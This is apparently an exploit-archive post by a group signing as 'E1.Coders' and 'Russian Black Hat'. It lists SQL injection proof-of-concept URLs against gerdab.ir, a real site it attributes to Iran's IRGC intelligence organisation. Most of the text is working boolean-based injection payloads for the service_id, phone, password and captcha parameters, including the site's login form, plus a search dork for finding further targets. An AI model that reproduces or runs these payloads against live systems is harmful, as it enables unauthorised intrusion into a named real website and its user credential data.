Authored by E1.Coders

Gerdab.ir suffers from a remote SQL injection vulnerability.


This site belongs to the Revolutionary Guards Intelligence Organization of the Islamic Republic of Iran (IRGC), which has a security problem with the SQL INJECTION Vulnerability "CWE-89".

We have repeatedly reported to this site that it has a security problem and has ignored our report.
We want to record this security issue




#########################################################################################################################
# #
# Exploit Title : Site affiliated To the intelligence agency Revolutionary Guards of the Islamic Republic of Iran (IRGC) SQL INJECTION Vulnerability #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : www.my.gerdab.ir #
# #
# Security Risk : Medium #
# #
# Description : All target's IRanian Military websites #
# #
# DorK : ""inurl:reports/status?s=" "site:my.gerdab.ir/reports/status?s=" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
#
#
# address (refer url): https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# vulnerabillity : GET SQL INJECT BOOLEAN Based string
#
# action url: https://gerdab.ir/fa/archive?sec_id=63&service_id=99999999

--------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# request type : COOKIE
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9
#
# parameter : service_id
#
# description : COOKIE SQL INJECTION BooleanBased String
#
# POC : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199

---------------------------------------

# vuln type : SQLInjection
#
# refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# request type : GET
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9
#
# parameter : service_id
#
# description : GET SQL INJECTION BooleanBased Integer
#
# POC : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end)
#
#
------------------------------------------------------
#
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999
#
# parameter : phone
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999/**/oR/**/8871966=8871966/**/aNd/**/7193=7193
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986
# parameter : phone
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986/**/RLIKE/**/(case/**/when/**//**/7338747=7338747/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999
#
# parameter : password
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999%27/**/oR/**/4563301=4563301/**/aNd/**/%276199%27=%276199
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819
# parameter : password
# description : POST SQL INJECTION BooleanBased Integer
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819/**/RLIKE/**/(case/**/when/**//**/8423820=8423820/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)
#
------------------------------------------------
#
# vuln type : SQLInjection
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999
#
# parameter : captcha
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999/**/oR/**/6019831=6019831--%20
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505
# parameter : captcha
# description : POST SQL INJECTION BooleanBased String
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505%27/**/RLIKE/**/(case/**/when/**//**/2804470=2804470/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'7917'='7917
------------------------------------------------
# #
# 1: https://my.gerdab.ir/reports/status?s=1' #
# #
# 2: https://my.gerdab.ir/reports/status?s%22=%221%22 #
# #
#########################################################################################################################
# #
# | Security Is JOCK | #
# #
# | Russian Black Hat | #
# #
#########################################################################################################################





--
E1 Coders